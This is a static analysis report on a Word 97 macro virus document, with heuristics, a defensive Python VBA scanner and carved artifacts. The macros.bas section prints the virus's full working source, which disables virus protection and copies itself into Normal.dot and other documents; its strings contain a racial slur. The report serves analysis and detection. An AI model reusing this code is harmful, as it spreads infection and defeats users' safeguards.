Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5267fced1b09266…

MALICIOUS

Office (OLE)

Size: 65.5 KB (67,072 bytes)
Created: 2000-09-20 04:03:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-19
MD5: 17c46c1abf71c31e3b876f26207e2bb0
SHA-1: 49385d779b1c9ea83ab6443746aaa3052d6b190d
SHA-256: c5267fced1b09266895872d2357ba7e9d36402d66a8e1437eb193692cdf98a5f
Risk score: 178

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen macro, and carries names associated with legacy WordBasic macro viruses (built-in Word command names such as ToolsMacro, FileOpen and FileSave reused as Sub names). The decoded source (macros.bas below) is a classic Word 97 macro virus. AutoOpen calls Bablas, which sets Options.VirusProtection = False and silences the Normal-template and document-properties save prompts, then SikatTemplate deletes every module other than "Fuck" and "ThisDocument" from Normal.dot with Application.OrganizerDelete and copies the "Fuck" module into it with Application.OrganizerCopy; AutoClose, FileClose, FileOpen and FileSave call SikatDocument, which does the same in the other direction into whatever document is being opened, saved or closed. Subs named ToolsMacro, ViewVbCode and FileTemplates override those Word commands so that Tools > Macro and the VBA editor only produce a "Sorry ... ya dont have da rights" message box; OpenMyMacro re-enables the editor behind a hard-coded password, and ToolsOptions restores the real settings only for the duration of the Options dialog before calling Bablas again. AutoExec disables auto macros and uses Application.OnTime to run Ancurin every seven seconds until a document is open to infect. The payload is a nuisance rather than destructive: during infection the window captions are briefly changed to Indonesian text ("Virus macro sedang aktif" and "(Hapus normal.dot kalo pengin selamat)", that is "macro virus is active" and "delete normal.dot if you want to be safe"), and on Friday or Sunday mornings ShowMessage beeps 100 times and shows a message box saying, in Indonesian, that the virus is easy to remove by deleting normal.dot, otherwise reinstall, and failing that sell the machine. The sample was authored in Word 8.0 (Word 97), which is consistent with VBA rather than genuine WordBasic code.
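The behaviours above can be checked mechanically against decoded VBA source. What follows is an added example, not part of this report or the analyzer that produced it: a small Python scanner that flags auto-execution entry points, Word command overrides, AV tampering and Normal-template replication, then joins VBA line continuations so that multi-line OrganizerCopy calls are matched as one statement. The embedded SAMPLE_VBA is a constructed excerpt modelled on macros.bas below, not the carved artifact itself, and the finding ids, severities and weights are the example's own labels rather than the report's heuristic ids or its 178 risk score.

```python
import re

# Constructed excerpt modelled on the decoded macros.bas in this report; it is not
# the carved artifact, just enough of its shape to exercise the checks below.
SAMPLE_VBA = """\
Sub Bablas()
    Options.SaveNormalPrompt = False
    Options.VirusProtection = False
End Sub

Sub ToolsMacro()
    H = MsgBox("Sorry ... ya dont have da rights", vbExclamation + vbOKOnly)
End Sub

Sub ViewVbCode()
    ToolsMacro
End Sub

Sub SikatTemplate()
    For Each obj In NormalTemplate.VBProject.VBComponents
        If obj.Name <> "Fuck" And obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next obj
    Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="Fuck", Object:=wdOrganizerObjectProjectItems
End Sub

Sub AutoOpen()
    Bablas
    SikatTemplate
End Sub

Sub AutoClose()
    SikatDocument
End Sub
"""

# Word auto-execution entry points: these run on open/close/start with no user action.
AUTO_EXEC = {"autoexec", "autoopen", "autoclose", "autoexit", "autonew"}
# Built-in Word command names. A Sub with one of these names replaces the menu
# command, which is how the sample blocks Tools > Macro and the VBA editor.
COMMAND_OVERRIDES = {"toolsmacro", "viewvbcode", "filetemplates", "toolsoptions",
                     "fileopen", "filesave", "fileclose", "helpabout"}

SUB_RE = re.compile(r"^[ \t]*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)

# Finding id, severity, regex tested against each logical line (continuations joined).
# Ids and severities are this example's own labels, not the report's heuristic ids.
LINE_PATTERNS = [
    ("av_tamper", "critical",
     re.compile(r"Options\.VirusProtection\s*=\s*False", re.I)),
    ("normal_template_replication", "critical",
     re.compile(r"\bOrganizerCopy\b.*\bNormalTemplate\b", re.I)),
    ("vbe_object_model", "high",
     re.compile(r"\.VBProject\b|\bVBComponents\b|\bCodeModule\b|\bAddFromString\b|\bInsertLines\b", re.I)),
    ("organizer_delete", "medium",
     re.compile(r"\bOrganizerDelete\b", re.I)),
]
SEVERITY_WEIGHT = {"critical": 50, "high": 30, "medium": 15, "low": 5}


def logical_lines(src):
    """Join VBA line continuations (trailing ' _') so a multi-line call is matched as one line."""
    return re.sub(r"[ \t]+_\r?\n[ \t]*", " ", src).splitlines()


def scan_vba(src):
    """Return (finding_id, severity, evidence) tuples for a decoded VBA module."""
    findings = []
    for name in SUB_RE.findall(src):
        key = name.lower()
        if key in AUTO_EXEC:
            findings.append(("auto_exec", "low", f"Sub {name}()"))
        elif key in COMMAND_OVERRIDES:
            findings.append(("command_override", "high", f"Sub {name}()"))
    for line in logical_lines(src):
        for fid, sev, rx in LINE_PATTERNS:
            if rx.search(line):
                findings.append((fid, sev, line.strip()))
    return findings


def risk_score(findings):
    """Add the weight of each distinct finding id once; repeats are extra evidence, not extra risk."""
    return sum({fid: SEVERITY_WEIGHT[sev] for fid, sev, _ in findings}.values())


if __name__ == "__main__":
    results = scan_vba(SAMPLE_VBA)
    for fid, sev, evidence in results:
        print(f"{sev:<8} {fid:<28} {evidence}")
    print("risk score:", risk_score(results))
```

Run it on the output of olevba (or on the carved source-cache strings) rather than on the raw OLE file: the checks are text matches on decoded source, so they are only as good as the extraction that feeds them, which is exactly the gap the orphaned-project finding in this report is about.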

Heuristics (7)

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. In this sample the replication is done with Application.OrganizerCopy between ActiveDocument and NormalTemplate (SikatTemplate and SikatDocument in macros.bas) after Application.OrganizerDelete has removed every other module from the target, and Options.VirusProtection = False is set in Bablas, which AutoOpen, AutoExec and ToolsOptions all call.
    Matched line in script
        Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • AutoClose macro low OLE_VBA_AUTOCLOSE
    AutoClose macro (Word naming; Auto_Close is the Excel equivalent)
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. In this sample the markers come from a Word 97 VBA project rather than a true WordBasic macro: the module reuses built-in command names (ToolsMacro, ViewVbCode, FileTemplates, ToolsOptions, FileOpen, FileSave, FileClose, HelpAbout) as Sub names to hijack those commands, and calls WordBasic.DisableAutoMacros through the VBA compatibility object.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 67,072 bytes but its declared streams total only 26,532 bytes: 40,540 bytes (60%) are not accounted for by any stream. Part of that difference is the header, FAT and directory sectors every compound file carries, so the figure to act on is the number of sectors that no FAT chain references. Unallocated sectors are the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure); in this sample the region holds the orphaned VBA source-cache records described in the next finding.
  • Recovered VBA macro source from orphaned project info OLE_ORPHANED_VBA_MACRO_SOURCE
    The VBA project could not be read through the normal stream layout, but VBA source-cache records (module names, referenced type libraries and their paths, API calls and literal source lines) survive in unallocated OLE space, consistent with a stripped or corrupted VBA project of the kind seen in legacy Word 97 macro viruses. The records were carved to vba_orphaned_source.txt for review and signature scanning, and the decompressed module source is in macros.bas (both listed under Extracted artifacts).

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: vba_orphaned_source.txt
Kind: vba-orphaned-source
Source: analyzer.wordbasic.recover_length_prefixed_source (VBA source-cache records recovered from a stripped/orphaned project in unallocated OLE space)
Size: 845 bytes
SHA-256: e42d794d0b9b5644ad2bdf2dbec81e169b0e79776260a97fd0834ac4ed15a7be
Preview (first 1,000 lines of the extracted script):
ThisDocument
Fuck
Project
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\VBA\VBA332.DLL
VBA
C:\Program Files\Microsoft Office\Office\MSWORD8.OLB
Word
C:\WINDOWS\SYSTEM\stdole2.tlb
stdole
C:\WINDOWS\SYSTEM\MSForms.TWD
MSForms
C:\WINDOWS\TEMP\VBE\MSForms.EXD
C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\MSO97.DLL
Office
ShowMessage
Bablas
ToolsMacro
ViewVbCode
FileTemplates
HelpAbout
ToolsOptions
ChangeCap
RestoreCap
OpenMyMacro
SikatDocument
SikatTemplate
AutoExit
FileOpen
AutoOpen
AutoClose
FileClose
FileSave
Ancurin
AutoExec
Virus macro sedang aktif
(Hapus normal.dot kalo pengin selamat)
Name
Fuck
ThisDocument
Deleting 
 Macro in Normal Template...
Copying da phunk freaka From 
 to Normal Template...
Macrosoft Word
 Macro in 
...
Copying da phunk freaka From Normal Template to 
Macro created 10/02/99 by  Abdul Aziz
Normal.NewMacros.Cegat
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5446 bytes
SHA-256: 6519a0452f42df7f1250c7546fe9fa1bec1bb85d72be3ce1c044676e63d30a70
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Fuck"
' Fuck version 1.0
' Created on May 21 1998
' Hope ya like it
Sub ShowMessage()
    H = Time
    If (WeekDay(Date) = vbFriday Or WeekDay(Date) = vbSunday) And Time < TimeValue("12:00:00") Then
    For i = 1 To 100
        Beep
    Next i
    H = MsgBox("Virus makro ini gampang ngilanginnya" & Chr(34) & _
    "Hapus aja file normal.dot" & Chr(34) & "," & Chr(13) & "gampang kan..." & Chr(13) & _
    "Kalo tetap nggak bisa... ya udah... diinstall ulang..." & Chr(13) & _
    "Kalo masih nggak bisa... jual aja" & Chr(13) & Chr(13) & "Bye bye... beware of Macrosoft Word 97" & _
    Chr(13) & "(Ma'af mengganggu.)", vbOKOnly + vbExclamation, "Take care")
    End If
End Sub

Sub Bablas()
Attribute Bablas.VB_Description = "Macro created 10/02/99 by  Abdul Aziz"
Attribute Bablas.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Cegat"
    Options.SaveNormalPrompt = False
    Options.VirusProtection = False
    Options.SavePropertiesPrompt = False
End Sub

Sub ToolsMacro()
    H = MsgBox("Sorry ... ya dont have da rights", vbExclamation + vbOKOnly)
End Sub

Sub ViewVbCode()
    ToolsMacro
End Sub

Sub FileTemplates()
    ToolsMacro
End Sub

Sub HelpAbout()
    H = MsgBox("This Macrosoft Word (TM) program is licensed to :" & Chr(13) & Chr(13) & _
    "Gangsta Niggaz", vbOKOnly + vbExclamation, "da phunk freaka... infoLab")
End Sub

Sub ToolsOptions()
    Options.SaveNormalPrompt = True
    Options.SavePropertiesPrompt = True
    Options.VirusProtection = True
    Dialogs(wdDialogToolsOptions).Show
    Bablas
End Sub

Sub ChangeCap()
    On Error Resume Next
    Application.Caption = "Virus macro sedang aktif"
    ActiveWindow.Caption = "(Hapus normal.dot kalo pengin selamat)"
End Sub

Sub RestoreCap()
    On Error Resume Next
    Application.Caption = "Macrosoft Word"
    ActiveWindow.Caption = ActiveDocument.Name
End Sub

Sub OpenMyMacro()
    If InputBox("Enter password", "da phunk freaka") = "azizoke" Then Application.ShowVisualBasicEditor = True
End Sub

Sub SikatDocument()
    Dim DocOk As Boolean
    DocOk = False
    
    
    For Each obj In ActiveDocument.VBProject.VBComponents
        If obj.Name = "Fuck" Then DocOk = True
        If obj.Name <> "Fuck" And obj.Name <> "ThisDocument" Then
            Application.StatusBar = "Deleting " + obj.Name + _
            " Macro in " + ActiveDocument.Name + "..."
            Application.OrganizerDelete Source:=ActiveDocument.FullName, _
            Name:=obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next obj
    If DocOk = False Then
        Application.StatusBar = "Copying da phunk freaka From Normal Template to " _
        + ActiveDocument.Name + "..."
       Application.OrganizerCopy Source:=NormalTemplate.FullName, _
        Destination:=ActiveDocument, Name:="Fuck", Object:=wdOrganizerObjectProjectItems
    End If
End Sub

Sub SikatTemplate()
    Dim NorOk As Boolean
    NorOk = False
    For Each obj In NormalTemplate.VBProject.VBComponents
        If obj.Name = "Fuck" Then NorOk = True
        If obj.Name <> "Fuck" And obj.Name <> "ThisDocument" Then
            Application.StatusBar = "Deleting " + obj.Name + _
            " Macro in Normal Template..."
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next obj
    If NorOk = False Then
        Application.StatusBar = "Copying da phunk freaka From " + ActiveDocument.Name + _
        " to Normal Template..."
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name:="Fuck", Object:=wdOrganizerObjectProjectItems
        Application.DisplayRecentFiles = False
        Application.DisplayRecentFiles = True
    End If
End Sub

Sub AutoExit()
    ShowMessage
    Application.quit
End Sub

Sub FileOpen()
    ChangeCap
    WordBasic.DisableAutoMacros True
    On Error Resume Next
    If Dialogs(wdDialogFileOpen).Show <> 0 Then
        SikatDocument
        ActiveDocument.Save
    End If
    RestoreCap
    WordBasic.DisableAutoMacros False
End Sub

Sub AutoOpen()
    Bablas
    ChangeCap
    SikatTemplate
    On Error Resume Next
    NormalTemplate.Save
    RestoreCap
End Sub

Sub AutoClose()
    SikatDocument
End Sub

Sub FileClose()
    AutoClose
End Sub

Sub FileSave()
    If ActiveDocument.Saved = False Then
        SikatDocument
        SikatTemplate
        On Error Resume Next
        ActiveDocument.Save
        ActiveDocument.Saved = True
    End If
End Sub

Sub Ancurin()
    C = Documents.Count
    If C <> 0 Then
        Normal.Fuck.SikatDocument
        WordBasic.DisableAutoMacros False
        On Error Resume Next
        If ActiveDocument.Name <> "Document1" Then ActiveDocument.Save
    Else: Application.OnTime Now + TimeValue("00:00:07"), "Normal.Fuck.Ancurin"
    End If
End Sub

Sub AutoExec()
    WordBasic.DisableAutoMacros True
    Bablas
    Application.OnTime Now + TimeValue("00:00:07"), "Normal.Fuck.Ancurin"
End Sub